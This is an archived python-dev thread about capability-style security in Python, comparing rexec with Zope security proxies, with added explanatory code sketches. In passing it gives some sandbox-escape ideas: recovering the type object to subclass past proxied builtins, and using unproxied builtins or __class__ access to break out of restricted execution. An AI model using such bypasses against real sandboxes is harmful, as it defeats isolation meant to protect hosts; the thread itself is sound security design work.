I have been trying to argue, though I feel a bit muddled at times, that the proxy approach eliminates the need for rexec and makes it possible to build a "restricted environment" without relying on the rexec code in the interpreter.
Wouldn't that suggest that the way to fix restricted execution is to do something proxylike, then?
Any security scheme needs some kind of information hiding to guarantee that untrusted code does not break into the representation of an object, so that, for example, an object can be used as a capability. I think we've discussed two different ways to implement information hiding.
Yes.
The rexec approach is to add code to the interpreter to disable certain introspection features when running untrusted code.
The proxy approach is to wrap protected objects in proxies before passing them to untrusted code.
Again, this suggests to me that perhaps restricted execution should also use wrapping. I guess I will study this idea in more detail when I start writing.
I think both techniques achieve the same end, but with different limitations. I prefer the proxy approach because it is more self-contained. The rexec approach requires that all developers working in the core on introspection features be aware of security issues. The security kernel ends up being most of the core interpreter -- anything that can introspect on objects. The proxy approach is to create an object that specifically disables introspection by not exposing internals to the core. We need to do some more careful analysis to be sure that proxies really achieve the goal of information hiding.
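A toy version of that information-hiding idea can be sketched in pure Python (hypothetical names; Zope's real proxies are implemented in C precisely because operations like type(), len(), and the operator slots bypass __getattribute__ at the C level):

```python
class Opaque:
    """Hypothetical sketch: forward ordinary attributes, refuse the
    introspective ones, and never expose the wrapped object itself."""

    _BLOCKED = frozenset({'__dict__', '__class__', '__module__'})

    def __init__(self, obj):
        object.__setattr__(self, '_obj', obj)

    def __getattribute__(self, name):
        if name in Opaque._BLOCKED:
            raise AttributeError('introspection disabled: %s' % name)
        # fetch the wrapped object without re-entering this method
        obj = object.__getattribute__(self, '_obj')
        return getattr(obj, name)

class Service:
    def ping(self):
        return 'pong'

s = Opaque(Service())
```

s.ping() works and runs with the real, unwrapped self, but s.__class__ raises AttributeError. Note the sketch's limits: type(s) still reveals the Opaque class, and special-method dispatch skips the instance, which is why a serious implementation has to intercept the type slots rather than rely on __getattribute__.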
If restricted execution were implemented in the same way, then proxies and restricted execution would both benefit from this analysis.
I think another benefit of proxies vs. rexec is that untrusted code can still use all of the standard introspection features when dealing with objects it creates itself. Code running in rexec can't use any introspective feature, period, because all those features are disabled. With the proxy approach, introspection is only disabled on protected objects.
Right - this does seem like a desirable feature.
I am going to write this all up into a document which can be used as a starting point for work to complete this.
It sounds like a PEP would be the right thing. It would be nice if the PEP could explain the rationale for a secure Python environment and then develop (at least) the capability approach to building that environment. Perhaps I could chip in with some explanation of the proxy approach.
That would be excellent! I will write a draft as specified in PEP 1. Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
Jeremy Hylton wrote: ...
I think both techniques achieve the same end, but with different limitations. I prefer the proxy approach because it is more self-contained. The rexec approach requires that all developers working in the core on introspection features be aware of security issues. The security kernel ends up being most of the core interpreter -- anything that can introspect on objects.
I think that there is an important corollary. Changes to the security policy are very hard to make. For example, if we change our mind about what should be safe or not:

- we have many places to make the change,
- we have lots of tests to redo,
- people have to reinstall or rebuild Python to get the change.

With proxies, the update is provided as a fairly small and self-contained library update.

Jim
Guido van Rossum wrote:
[Moving a discussion about capabilities to where it arguably belongs]
Thanks Guido. I'll respond to Ben here.
[Ben Laurie]
The point about capabilities is that mere possession of a capability is all that is required to exercise it. If you start adding security checkers to them, then you don't have capabilities anymore.
Right. Jeremy keeps reminding me of this point. Zope 3 uses proxies in a way that doesn't conform to this definition. Zope proxies proxy an object to be protected *and* a policy object called a "checker". The checkers used in Zope perform checks at access time. One could, instead, perform the checks when the proxies are created or earlier and use checkers that simply allowed some names or operations and not others. IOW, you could certainly implement a strict capability model with Zope proxies. ...
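The object-plus-checker pairing Jim describes maps onto a small sketch (hypothetical names; the real zope.security checkers are far richer). The point to notice is *when* the policy runs: here it runs on every attribute access, whereas a strict capability-style variant would run the checks once, at proxy-creation time, and hand out an object that simply lacks the forbidden names:

```python
class Checker:
    """Hypothetical policy object: allows a fixed set of names."""
    def __init__(self, allowed):
        self.allowed = frozenset(allowed)

    def check(self, name):
        if name not in self.allowed:
            raise PermissionError('forbidden: %s' % name)

class CheckedProxy:
    """Pairs an object to protect with a checker, as in Zope proxies."""
    def __init__(self, obj, checker):
        self.__dict__['_obj'] = obj
        self.__dict__['_checker'] = checker

    def __getattr__(self, name):
        self._checker.check(name)  # policy consulted at access time
        return getattr(self._obj, name)

# A read-only view of a configuration registry, as in Guido's example:
registry = {'db': 'postgres', 'port': 5432}
view = CheckedProxy(registry, Checker({'get', 'keys'}))
```

view.get('db') and view.keys() succeed; view.pop raises PermissionError. Because the policy lives in the checker, changing what counts as "read-only" is a library change, not an interpreter change.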
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
I'll give an answer similar to Guido's but with a different emphasis.

I'm an object zealot. :) I like working with object-oriented systems. I don't want to lose that and, thus, I don't want computation to be reduced to passing around basic values and functions. I want to be able to pass around objects with interfaces. Zope proxies make it easy to define a capability in terms of an interface. I think this is really important for object-oriented systems.

Another feature of Zope proxies that I think is important is that they automate creation of proxies. When you get an attribute from a proxy, the value is proxied. (Actually, the checker decides whether the value is proxied. Zope checkers proxy all objects except basic objects such as numbers, strings, and None.) When you perform an operation on a proxied object, the result is proxied. This means that the code being proxied doesn't have to be aware of proxies, capabilities, or a security model.

Note that when you access a method on a proxied object, the method itself is proxied. All you can do with a proxied method is call it, get its name, and convert it to a string. This is true even if the proxied method is passed to unrestricted code.

I agree that we all need restricted execution to work better than it does now. I was hoping that we could collaborate at a higher level as well.

Jim
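The auto-wrapping rule can be sketched as follows (a hypothetical simplification: in Zope the checker decides what is basic, and methods are more tightly restricted than this). Values that come out of a proxy, whether by attribute access or by calling, come back proxied, except for basic immutable objects:

```python
_BASIC = (int, float, str, bytes, bool, type(None))

class AutoProxy:
    """Sketch of recursive auto-proxying (hypothetical name)."""
    def __init__(self, obj):
        self.__dict__['_obj'] = obj

    def __getattr__(self, name):
        value = getattr(self._obj, name)
        return value if isinstance(value, _BASIC) else AutoProxy(value)

    def __call__(self, *args, **kw):
        result = self._obj(*args, **kw)
        return result if isinstance(result, _BASIC) else AutoProxy(result)

class Registry:
    def __init__(self):
        self.data = {'answer': 41}
    def get(self, key):
        return self.data[key] + 1

proxy = AutoProxy(Registry())
method = proxy.get  # the bound method itself comes back proxied
```

Calling the proxied method works, and its int result passes through unwrapped, while non-basic results (like proxy.data) stay wrapped. The code inside Registry never sees a proxy at all: its methods run with the real, unwrapped self.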
E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry.
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.

Greg Ewing, Computer Science Dept,   +--------------------------------------+
University of Canterbury,            | A citizen of NewZealandCorp, a       |
Christchurch, New Zealand            | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz           +--------------------------------------+
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
I think the capability folks would object to calling it a capability though. :-)

Two questions:

- Where to store the flag? It probably would cost 4 bytes per object.
- Which attributes are considered introspective?

--Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote:
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
I think the capability folks would object to calling it a capability though. :-)
No, objects are another way to do it, though it seems to me with somewhat less ease - because the most common use of capabilities is to restrict the type of access to objects other objects have, so you'd need to have multiple objects proxying to the "real" one if you do it at the object level. If we were going to go this route, I'd like the alternative of _also_ being able to set the flag on a bound method.
Two questions:
- Where to store the flag? It probably would cost 4 bytes per object.
You can swap space for time by storing it as an attribute, of course.
- Which attributes are considered introspective?
All of them, except methods. Of course, this is what my first approximation to capabilities did (that's what a "capclass" was).

Cheers, Ben.
[Someone else]
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
Guido van Rossum wrote:
I think the capability folks would object to calling it a capability though. :-)
[Ben]
No, objects are another way to do it, though it seems to me with somewhat less ease - because the most common use of capabilities is to restrict the type of access to objects other objects have, so you'd need to have multiple objects proxying to the "real" one if you do it at the object level.
I'm not sure I understand. Do you mean that because there may be several security levels you'd need different capabilities for an object for each level? Since there are also several methods, you end up managing multiple capabilities in either case. Anyway, Zope security proxies aren't "managed" this way. The trusted code doesn't have a set of objects representing capabilities that it hands out -- a proxy is manufactured freshly on each use. I wonder if this might be one cause of repeated misunderstandings?
If we were going to go this route, I'd like the alternative of _also_ being able to set the flag on a bound method.
Two questions:
- Where to store the flag? It probably would cost 4 bytes per object.
You can swap space for time by storing it as an attribute, of course.
Not all Python objects have a dict where to store arbitrary attributes. And even if they do, that's about the most expensive way to store a flag. And you'd have to worry about someone getting a hold of that dict and deleting the attribute (assuming that the flag defaults to allow introspection, otherwise no Python code written today would continue to work).
- Which attributes are considered introspective?
All of them, except methods.
That's not very Pythonic.
Of course, this is what my first approximation to capabilities did (that's what a "capclass" was).
I never knew what a capclass was. I don't think you ever explained it so clearly ("doesn't allow access to non-method attributes") before. --Guido van Rossum (home page: http://www.python.org/~guido/)
On Sun, 9 Mar 2003, Guido van Rossum wrote:
- Which attributes are considered introspective?
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head:

1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__).

2. The following instance attributes are off limits: __class__, __dict__, __module__.

That might be a reasonable start. However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally-accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.

-- ?!ng
Ka-Ping Yee wrote:
On Sun, 9 Mar 2003, Guido van Rossum wrote:
- Which attributes are considered introspective?
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head:
1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__).
Well, I see no harm and much usefulness in allowing __name__, __repr__, and __str__.
2. The following instance attributes are off limits: __class__, __dict__, __module__.
That might be a reasonable start.
I generally want to be able to get the __class__. This is harmless in my case, because I get a proxy back.
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally-accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
I don't understand why this is necessary. In general, you want to restrict what attributes (data, properties, methods, etc.) are accessible in certain situations. I don't follow what makes data attributes special.

Jim
On Mon, 10 Mar 2003, Jim Fulton wrote:
Ka-Ping Yee wrote:
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head:
1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__).
Well, I see no harm and much usefulness in allowing __name__, __repr__, and __str__.
Depends. In a truly secure system, classes would only reveal information about themselves if they wanted to. The default __repr__ gives away the id() of the instance, and __name__ gives away the name of the method, which would prevent you from creating proxies that are indistinguishable from the original. Sometimes it is useful to be able to do that.
2. The following instance attributes are off limits: __class__, __dict__, __module__.
I generally want to be able to get the __class__. This is harmless in my case, because I get a proxy back.
We definitely do not want to provide access to __class__. Access to an instance should not give you the power to create more instances of its class. If you passed somebody a file object, access to the class would convey the power to open any file on the filesystem!
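Ping's file example, demonstrated here with io.StringIO so it runs without touching the filesystem: reaching __class__ turns possession of one instance into the power to construct arbitrary new ones (for a real file object, that power is "open any path"):

```python
import io

buf = io.StringIO('the instance you were handed')
cls = buf.__class__  # reachable unless __class__ access is blocked
fresh = cls('a brand-new object, conjured from the old one')
```

The holder of buf was granted one string's worth of data, but via __class__ they hold the constructor itself, which is exactly why __class__ belongs on the off-limits list.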
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally- accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
I don't understand why this is necessary. In general, you want to restrict what attributes (data, properties, methods, etc.) are accessible in certain situations. I don't follow what makes data attributes special.
Instances currently don't have a private place to put their state, and unless there is a convenient way to do that, implementers will tend to expose their instance state in public data attributes. Even if the instance had properties, the properties still (as yet) have no way to conveniently distinguish whether access is being attempted from within an instance method or from outside the instance. -- ?!ng
From: "Ka-Ping Yee" <ping@zesty.ca>
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally-accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
Indeed. The issue is that implementations of methods are normal functions that access the instance attributes the same way everything else does; that's why Zope proxies become necessary (and a bit brittle):

class A:
    def geta(self):
        return self.a  # 1

a = A()
a.a  # 2

(1) and (2) use the same operation/execution path.

The other issue, as you wrote, is also that introspection operations are like normal operations (and they share the same execution path too):

a.__dict__ vs. introspect(a).__dict__

The problem is that there is obviously a flexibility/ease-of-use trade-off. Python is a language that maximizes that, and where e.g. introspection feels easy and natural; OTOH analyzing security becomes nightmarish.

regards.
Samuele Pedroni wrote:
From: "Ka-Ping Yee" <ping@zesty.ca>
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally-accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
Indeed. The issue is that implementations of methods are normal functions that access the instance attributes the same way everything else does; that's why Zope proxies become necessary (and a bit brittle):
class A:
    def geta(self):
        return self.a  # 1
a=A()
a.a # 2
(1) and (2) are using the same operation/execution path.
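The two numbered accesses in runnable form (trivial on purpose): the language offers no hook that distinguishes them, which is exactly why protection has to be bolted on from outside, via rexec or via a proxy that intercepts the shared path:

```python
class A:
    def geta(self):
        return self.a  # (1) access from inside a method

a = A()
a.a = 42               # plain data attribute

# (2) external access uses the very same lookup machinery as (1):
inside = a.geta()
outside = a.a
```

Both lookups go through the same attribute protocol on the same instance; neither the interpreter nor the object can tell which one came "from inside".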
This points out a nice feature of Zope proxies. The proxied object's methods are called with an unproxied self, so you can easily allow access to the object's methods without providing access to other attributes. Or, equivalently, you can provide access to one set of methods, and those methods can use other methods that you don't provide access to.

Could you explain why you say that Zope proxies are brittle?

Jim
From: "Jim Fulton" <jim@zope.com>
Could you explain why you say that zope proxies are brittle?
from my small experience playing with RestrictedInterpreter:

you wrap a lot of builtins into proxies:

*) 'object', for example; then

class C(object): ...

does not work. But given that some basic types are left alone, one can use

Type = ''.__class__.__class__

class C:
    __metaclass__ = Type

*) iter seems not to work (deliberate decision or bug?)

*) proxied 'property' is unusable

*) built-in functions return proxies even if the arguments were unproxied:

_12 = map(None,[1,2])

class A: pass
a = A()
a.a = [1,2]
_12 = getattr(a,'a')

in both cases with the proxied version of map and getattr the result _12 would be a proxied list.

deliberate safer-side decisions? I can see it both ways:

- see other mail
- map(None,[obj])[0] becomes a way to get a proxied version of obj that can be passed to code that would maybe unwrap it and believe that it is some other legit object.

regards.
Samuele Pedroni wrote:
From: "Jim Fulton" <jim@zope.com>
Could you explain why you say that zope proxies are brittle?
from my small experience playing with RestrictedInterpreter:
Um, er, I've been meaning to mention that RestrictedInterpreter is not done and isn't used anywhere yet. It's a bit of a decoy at this time. :]

At this point, RestrictedInterpreter is really an incomplete prototype. OTOH, RestrictedBuiltins is used for Python expressions in Zope page templates. Simple Python expressions in ZPT don't tend to run into the sorts of problems you've found.
you wrap into proxies a lot of builtins:
*) 'object' for example, then class C(object): ... does not work
Right. We will fix this. It should be possible to subclass proxied classes. The resulting classes should then be proxies. object and type should probably be special cases.
but given that some basic types are left alone, one can use Type = ''.__class__.__class__
class C:
    __metaclass__ = Type
*) iter seems not to work (deliberate decision or bug?)
bug I imagine.
*) proxied 'property' is unusable
ditto
*) built-in functions return proxies even if the argument were unproxied:
_12 = map(None,[1,2])
Interesting case. It looks like map shouldn't be proxied.
class A: pass
a = A()
a.a = [1,2]
_12 = getattr(a,'a')
Ditto.
in both cases with the proxied version of map and getattr the result _12 would be a proxied list.
deliberate safer-side decisions?
no.
I can see it both ways: - see other mail
I don't know what other mail you are referring to. Maybe it doesn't matter.
- map(None,[obj])[0] becomes a way to get a proxied version of obj that can be passed to code that would maybe unwrap it and believe that it is some other legit object.
Any code that unwraps proxies should be viewed with great suspicion. I currently consider any use of that API without an extensive accompanying comment to be a virtual "XXX" comment.

I'm sorry to have had you spend so much time on what is a bit of a decoy. OTOH, you've pointed out a number of points that we do need to address to move our RestrictedInterpreter beyond the prototype stage. You've found a number of problems and issues in deciding how to proxy builtins. I would argue that these are not problems in the proxies themselves but in their application to builtins. But perhaps I'm wrong.

Another area that we haven't dealt with yet is how proxies will work in untrusted *persistent* modules. But you probably don't want to know about that. ;)

Jim
From: "Jim Fulton" <jim@zope.com>
I can see it both ways: - see other mail
I don't know what other mail you are refering to. Maybe it doesn't matter.
the other side of the coin is that with a working unproxied/non-proxying 'property' and/or non-proxied map & getattr and an unproxied MyExc instance, I can break out of restricted execution.
From: "Jim Fulton" <jim@zope.com>
Samuele Pedroni wrote:
From: "Jim Fulton" <jim@zope.com>
Could you explain why you say that zope proxies are brittle?
from my small experience playing with RestrictedInterpreter:
Um, er, I've been meaning to mention that RestrictedInterpreter is not done and isn't used anywhere yet. It's a bit of a decoy at this time. :]
I knew it isn't used. I'm not that naive; it seemed nevertheless a showcase/playground for the proxy + restricted execution approach. regards.
On Sun, 9 Mar 2003, Guido van Rossum wrote:
- Which attributes are considered introspective?
Here's a preliminary description of the boundary between "introspective" and "restricted", off the top of my head:
1. The only thing you can do with a bound method is to call it (bound methods have no attributes except __doc__).
Plus __repr__ and __str__. And if they have attributes at all they have __getattribute__. And if they are callable they have __call__.
2. The following instance attributes are off limits: __class__, __dict__, __module__.
That might be a reasonable start.
Not sure. Classic rexec disallowed these (and a few more), but the problem with disallowing __dict__ of an instance was that this made it impossible for untrusted code to use certain coding patterns like overriding __setattr__.
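The coding pattern Guido mentions is worth seeing concretely: any class overriding __setattr__ must write through __dict__ to avoid infinite recursion, so code that is denied __dict__ access cannot use the idiom at all:

```python
class Audited:
    """Standard __setattr__-override idiom: writes go through __dict__."""
    def __init__(self):
        # bypass our own __setattr__ while bootstrapping
        self.__dict__['log'] = []

    def __setattr__(self, name, value):
        self.log.append(name)
        # 'self.name = value' here would recurse forever;
        # __dict__ is the only non-recursive way in
        self.__dict__[name] = value

a = Audited()
a.x = 1
a.y = 2
```

With __dict__ off limits, the only escape hatches left are object.__setattr__ (itself introspective) or keeping state outside the instance entirely, which is the tension the rest of this thread circles around.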
However, there is still the problem that the established technique for storing instance-specific state in Python is to use globally-accessible data attributes instead of a limited scope. We would also need to add a safe (private) place for instances to put state.
I wonder if we could write special descriptors for this? The problem as I see it is that the interpreter doesn't keep track of whether a particular function is part of a class definition or not, so there's no way to tell whether it should have access to private data or not. Proxies get around this, but with the stated disadvantages. --Guido van Rossum (home page: http://www.python.org/~guido/)
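One closure-based sketch of the direction Guido is wondering about (all names hypothetical): keep the private state in a dict that only code defined alongside the class can see, so "being part of the class definition" is modeled by lexical scope rather than tracked by the interpreter:

```python
def make_account_class():
    # _balances is reachable only from code defined inside this
    # function -- the moral equivalent of "part of the class definition".
    _balances = {}

    class Account:
        def __init__(self, opening):
            _balances[id(self)] = opening

        def deposit(self, amount):
            _balances[id(self)] += amount

        def balance(self):
            return _balances[id(self)]

    return Account

# Note: keying on id(self) leaks entries when accounts die; a real
# version would need weak references.  This is only a sketch.
Account = make_account_class()
acct = Account(100)
acct.deposit(50)
```

The instance itself carries no state at all, so there is nothing for `__dict__` introspection to reveal.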
Greg Ewing wrote:
E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry.
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
Yes, but not a very useful one. For example, given a file, you often want to create a "file read" capability which is an object that allows reading the file but not writing the file. Just preventing introspection isn't enough. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
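Jim's "file read" capability can be sketched in today's Python by handing out only the reading methods as bound methods (illustrative names; `io.StringIO` stands in for a real file):

```python
import io

class Namespace:
    pass

def FileReadCap(f):
    # The holder gets bound methods for reading only; f itself is never
    # exposed, so there is no path to f.write().  (A sketch only -- real
    # security would also have to restrict introspection of the bound
    # methods themselves, as discussed later in this thread.)
    cap = Namespace()
    cap.read = f.read
    cap.readline = f.readline
    return cap

f = io.StringIO("hello\nworld\n")
cap = FileReadCap(f)
```

The capability simply has no `write` in its vocabulary; whether that is airtight depends on closing the introspection routes this thread is debating.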
On Mon, 10 Mar 2003, Jim Fulton wrote:
Maybe every Python object should have a flag which can be set to prevent introspection -- like the current restricted execution mechanism, but on a per-object basis. Then any object could be used as a capability.
Yes, but not a very useful one. For example, given a file, you often want to create a "file read" capability which is an object that allows reading the file but not writing the file. Just preventing introspection isn't enough.
All right. Let me provide an example; maybe this can help ground the discussion a bit.

We seem to be doing a lot of dancing around the issue of what a capability is. In my view, it's a red herring to discuss whether or not a particular object "is a capability" or not. It's like asking whether something is an "object". Capabilities are a discipline under which objects are used -- it's better to think of them as a technique or a style of programming. What is at issue here (IMHO) is "how might Python change to facilitate this style of programming?"

(The analogy with object-oriented programming holds here also. Even if Python didn't have a "class" keyword, you could still program in an object-oriented style. In fact, the C implementation of Python is clearly object-oriented, even though C has no features specifically designed for OOP. But adding "class" made it a lot easier to do a particular style of object-oriented programming in Python. Unfortunately, the particular style encouraged by Python's "class" keyword doesn't work so well for capability-style programming, because all instance state is public. But Python's "class" is not the only way to do object-oriented programming -- see below.)

Okay, at last to the example, then. Here is one way to program in a capability style using today's Python, relying on no changes to the interpreter. This example defines a "class" called DirectoryReader that provides read-only access to only a particular subtree of the filesystem.
import os

class Namespace:
    def __init__(self, *args, **kw):
        for value in args:
            self.__dict__[value.__name__] = value
        for name, value in kw.items():
            self.__dict__[name] = value

class ReadOnly(Namespace):
    def __setattr__(self, name, value):
        raise TypeError('read-only namespace')

def FileReader(path, name):
    self = Namespace(file=open(path, 'r'))
    def __repr__():
        return '<FileReader %r>' % name
    def reset():
        self.file.seek(0)
    return ReadOnly(__repr__, reset, self.file.read, self.file.close)

def DirectoryReader(path, name):
    def __repr__():
        return '<DirectoryReader %r>' % name
    def list():
        return os.listdir(path)
    def readfile(name):
        fullpath = os.path.join(path, name)
        if os.path.isfile(fullpath):
            return FileReader(fullpath, name)
    def getdir(name):
        fullpath = os.path.join(path, name)
        if os.path.isdir(fullpath):
            return DirectoryReader(fullpath, name)
    return ReadOnly(__repr__, list, readfile, getdir)

Now, if we pass an instance of DirectoryReader to code running in restricted mode, i think this is actually secure. Specifically, the only introspective attributes we have to disallow, in order for these objects to enforce their intended restrictions, are im_self and func_globals. Of course, we still have to hide __import__ and sys.modules if we want to prevent code from obtaining access to the filesystem in other ways. Hiding __dict__, while it has no impact on restricting filesystem access, allows us to pass the same DirectoryReader object to two clients without inadvertently creating a communication channel between them.

-- ?!ng
On Sat, 29 Mar 2003, Ka-Ping Yee wrote:
Okay, at last to the example, then.
The following is a better formulation in the capability style -- please ignore the previous one. The previously posted code allows names to carry authority, which is a big no-no. This code gets rid of names altogether in the API for file access; it's better to deal with just objects.

import os, __builtin__

class Namespace:
    def __init__(self, *args, **kw):
        for value in args:
            self.__dict__[value.__name__] = value
        for name, value in kw.items():
            self.__dict__[name] = value

class ImmutableNamespace(Namespace):
    def __setattr__(self, name, value):
        raise TypeError('read-only namespace')

def ReadStream(file, name):
    def __repr__():
        return '<ReadStream %r>' % name
    return ImmutableNamespace(__repr__, file.read, file.close, name=name)

def FileReader(path, name):
    def __repr__():
        return '<FileReader %r>' % name
    def open():
        return ReadStream(__builtin__.open(path, 'r'), name)
    def getsize():
        return os.path.getsize(path)
    def getmtime():
        return os.path.getmtime(path)
    return ImmutableNamespace(__repr__, open, getsize, getmtime, name=name)

def DirectoryReader(path, name):
    def __repr__():
        return '<DirectoryReader %r>' % name
    def getfiles():
        files = []
        for name in os.listdir(path):
            fullpath = os.path.join(path, name)
            if os.path.isfile(fullpath):
                files.append(FileReader(fullpath, name))
        return files
    def getdirs():
        dirs = []
        for name in os.listdir(path):
            fullpath = os.path.join(path, name)
            if os.path.isdir(fullpath):
                dirs.append(DirectoryReader(fullpath, name))
        return dirs
    return ImmutableNamespace(__repr__, getfiles, getdirs, name=name)

-- ?!ng
Ka-Ping Yee wrote:
...
Specifically, the only introspective attributes we have to disallow, in order for these objects to enforce their intended restrictions, are im_self and func_globals. Of course, we still have to hide __import__ and sys.modules if we want to prevent code from obtaining access to the filesystem in other ways.
It wouldn't have hurt for you to describe how the code achieves security by using lexical closure namespaces instead of dictionary-backed namespaces. ;)

Part of the trick is that the external names are irrelevant to the functioning of the object.

I don't understand one thing. The immutability imposed by the "ImmutableNamespace" trick is easy to turn off. But once I turn it off, I couldn't figure out any way to violate the security, because the closure's variables are invisible to any code that is not defined within its block. Why bother with the ImmutableNamespace bit at all?

x = DirectoryReader(".", "foo")
print x.getfiles()
del x.__class__.__setattr__
x.foo = 5
del x.getfiles
del x.getdirs
x.getfiles()

Traceback (most recent call last):
  File "../foo.py", line 64, in ?
    x.getfiles()
AttributeError: ImmutableNamespace instance has no attribute 'getfiles'

But I couldn't figure out how to use this to get access to the file system because, as I said before, the external names are irrelevant to the object's implementation. They are early bound.

def FileReader(path, name):
    ...
    def open2():
        print "open2"
        return open()

direct = DirectoryReader(".", "foo")
file = direct.getfiles()[0]
print file.open2()
FileReaderClass = file.__class__
del FileReaderClass.__setattr__
del file.open
print file.open2()

"open2" binds to open at definition time, not at runtime.

I can't see in this model how to implement what C++ calls a "friend" class. Even C++ and Java have ways that related classes can poke around each other's internals. So perhaps this is part of what would need to change in Python to have a first-class capabilities feature.

If this technique became widespread, Python's restrictions on assigning to lexically inherited variables would probably become annoying.

Paul Prescod
On Sun, 30 Mar 2003, Paul Prescod wrote:
It wouldn't have hurt for you to describe how the code achieves security by using lexical closure namespaces instead of dictionary-backed namespaces. ;)
Sorry. :) I assumed it would be clear.
I don't understand one thing.
The immutability imposed by the "ImmutableNamespace" trick is easy to turn off. But once I turn it off, I couldn't figure out any way to violate the security because the closure's variables are invisible to any code that is not defined within its block. Why bother with the ImmutableNamespace bit at all?
That immutability isn't required in order to prevent filesystem access. That immutability is only there to prevent multiple clients of the same DirectoryReader to use the DirectoryReader as a communication channel.
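The covert channel is easy to demonstrate with a minimal sketch: given a mutable shared object, one client can store an attribute that another client reads back.

```python
class Namespace:
    pass

shared = Namespace()   # stands in for one reader object handed to two clients

def client_a(obj):
    obj.covert = "message from A"        # A smuggles data onto the object

def client_b(obj):
    return getattr(obj, "covert", None)  # ...and B reads it back

client_a(shared)
received = client_b(shared)
```

Raising TypeError in `__setattr__`, as ImmutableNamespace does, closes exactly this channel.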
del x.__class__.__setattr__
Sneaky. :) In restricted mode you wouldn't be able to do that.
I can't see in this model how to implement what C++ calls a "friend" class.
I haven't tried an example that requires that yet, but two classes could communicate through access to a shared object if they wanted to.
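A sketch of that shared-object idea in the same closure style (hypothetical Stack/iterator pair): the container explicitly grants its iterator direct access to the internal list, which is about as close to "friend" as capabilities get.

```python
class Namespace:
    def __init__(self, *args):
        for value in args:
            self.__dict__[value.__name__] = value

def Stack():
    items = []                  # internal state, invisible to callers
    def push(x):
        items.append(x)
    def iterate():
        # A second capability-style object, deliberately granted direct
        # access to the same `items` list -- friendship by explicit grant.
        pos = [0]               # boxed, since we can't rebind outer names
        def next():
            value = items[pos[0]]
            pos[0] += 1
            return value
        return Namespace(next)
    return Namespace(push, iterate)

s = Stack()
s.push(10)
s.push(20)
it = s.iterate()
```

No class-level friendship declaration is involved: the grant happens object by object, at the moment `iterate` closes over `items`.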
If this technique became widespread, Python's restrictions on assigning to lexically inherited variables would probably become annoying.
The Namespace offers a possible workaround. I didn't end up using it in my second code example because none of the objects have mutable state, but here's how you could do it:

def Counter():
    self = Namespace()
    self.i = 0
    def next():
        self.i += 1
        return self.i
    return ImmutableNamespace(next)

It would be cool if you could suggest little "security challenges" to work through. Given specific scenarios requiring things like mutability or friend classes, i think trying to implement them in this style could be very instructive.

-- ?!ng
Ka-Ping Yee wrote:
On Sun, 30 Mar 2003, Paul Prescod wrote:
It wouldn't have hurt for you to describe how the code achieves security by using lexical closure namespaces instead of dictionary-backed namespaces. ;)
Sorry. :) I assumed it would be clear.
It probably is for those following the thread more closely.
That immutability isn't required in order to prevent filesystem access.
Okay, now I see that that's what you meant about "__dict__". You were talking about the object's namespace in general, not the magical attribute named __dict__.
...
del x.__class__.__setattr__
Sneaky. :)
I would have complimented you on the elegance of this proposal but I thought it might just be a translation of E's object construct. To whatever extent you innovated in creating it, congratulations, it's very cool.
....In restricted mode you wouldn't be able to do that.
I'm not clear (because I've been following the thread with half my brain, over quite a few days) whether you are making or have made some specific proposal. I guess you are proposing a restricted mode that would make this example actually secure as opposed to almost secure. Are you also proposing any changes to the syntax? Also, is restricted mode an interpreter mode or is it scoped by module? I can't see how it would work as an interpreter mode because too much library code depends on introspectability and hackability of Python objects.
I can't see in this model how to implement what C++ calls a "friend" class.
I haven't tried an example that requires that yet, but two classes could communicate through access to a shared object if they wanted to.
This doesn't actually simulate "friend", but that's probably because friend makes no sense in a capability system.

It occurs to me after further thought that there are two orthogonal problems. First is privacy for the sake of software engineering. Python has always rejected that, and I'm glad it has (although it makes advocacy harder). This sort of privacy just gets in your way when you're trying to coerce code into doing what you want when it wasn't designed to. Languages like C++ make it really hard to hack when you need to, but they don't really prevent you from doing it if you are determined enough, so you have the worst of both worlds.

Second is safety for the sake of security. IF you have chosen the capabilities model of security, THEN "friend" perhaps doesn't make sense. You either have a capability reference or you don't. The code's compile-time class or package is irrelevant. Allowing classes (as opposed to objects) to declare each other friends probably only opens up security holes.

